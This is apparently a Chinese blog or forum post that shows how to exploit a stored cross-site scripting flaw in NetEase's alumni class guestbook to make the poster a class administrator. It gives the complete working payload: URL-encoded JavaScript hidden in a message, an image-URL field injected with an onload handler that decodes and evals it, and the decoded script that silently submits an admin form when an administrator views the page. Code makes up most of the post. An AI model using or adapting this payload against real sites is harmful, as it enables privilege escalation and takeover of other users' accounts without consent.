1.方法：

網(wǎng)易同學(xué)錄留言功能存在跨站，這里演示一個利用它把自己加為班級管理員的方法。

在留言框里填寫：

+++try%20%7B%0D%0A%09var%20as%20%3D%20document.getElementsByTagName%28%22a%22%29%3B%0D%0A%09var%20frm%20%3D%20document.getElementsByTagName%28%22iframe%22%29%5B0%5D%3B%0D%0A%09frm.onload%20%3D%20function%28%29%20%7B%0D%0A%09%09var%20oFrm%20%3D%20document.getElementsByTagName%28%22iframe%22%29%5B0%5D%3B%0D%0A%09%09oFrm.onload%20%3D%20%22%22%3B%0D%0A%09%09var%20oDoc%20%3D%20oFrm.contentWindow.document%3B%0D%0A%09%09oDoc.all%5B%22who%22%5D%5B1%5D.checked%20%3D%20true%3B%0D%0A%09%09oDoc.dealmember.action%20%3D%20%22backaction/UpdateClassMate.jsp%3Ff%3D1%22%3B%0D%0A%09%09oDoc.dealmember.submit%28%29%3B%0D%0A%09%7D%0D%0A%09frm.src%20%3D%20as%5B34%5D.href%3B%0D%0A%7D%20catch%20%28e%29%20%7B%0D%0A%09alert%28e%29%3B%0D%0A%7D---
在留言的貼圖url的輸入框里填寫：

http://alumniimg.163.com/new/images/classhome_logo.gif" onload="var t=document.body.innerHTML;var s=t.indexOf('+++')+3;var e=t.indexOf('---');eval(unescape(t.substring(s,e)));">
管理員察看班級留言時就會把我添加為管理員。

2.原理：

留言框里填寫的留言+++和---之間的部分代碼解碼后如下：


try {
 var as = document.getElementsByTagName("a");
 var frm = document.getElementsByTagName("iframe")[0];
 frm.onload = function() {
  var oFrm = document.getElementsByTagName("iframe")[0];
  oFrm.onload = "";
  var oDoc = oFrm.contentWindow.document;
  oDoc.all["who"][1].checked = true;
  oDoc.dealmember.action = "backaction/UpdateClassMate.jsp?f=1";
  oDoc.dealmember.submit();
 }
 frm.src = as[34].href;
} catch (e) {
 alert(e);
}
漏洞出在貼圖url的輸入框沒有過濾url，我在這里貼一個圖，加上個onload事件，只要圖片
url有效，圖片正常載入就會觸發(fā)該事件，執(zhí)行我的onload里的代碼，而onload里的代碼搜索
我的留言里的代碼，進行解碼，然后執(zhí)行。因為圖片url的長度有限制，所以我才做這么一次
跳轉(zhuǎn)，把我要做的事情分為兩步。

3.最后：

為什么要貼這個沒啥技術(shù)含量的東西，主要是覺得比較funy，你不覺得這樣的利用過程和溢出
跳轉(zhuǎn)執(zhí)行shellcode有異曲同工的意思，因為有長度限制，所以我們要把shellcode分為幾部分，
第一部分跳到第二部分來突破長度的限制，所有漏洞的原理本身就相似。
跨站的利用也可以玩的很有意思，比如＂現(xiàn)有html和js上下文的利用，自我隱藏，腳本變形，
突破長度限制，跨站漏洞蠕蟲等等＂，拋個磚頭在這里等大家的玉。

最新評論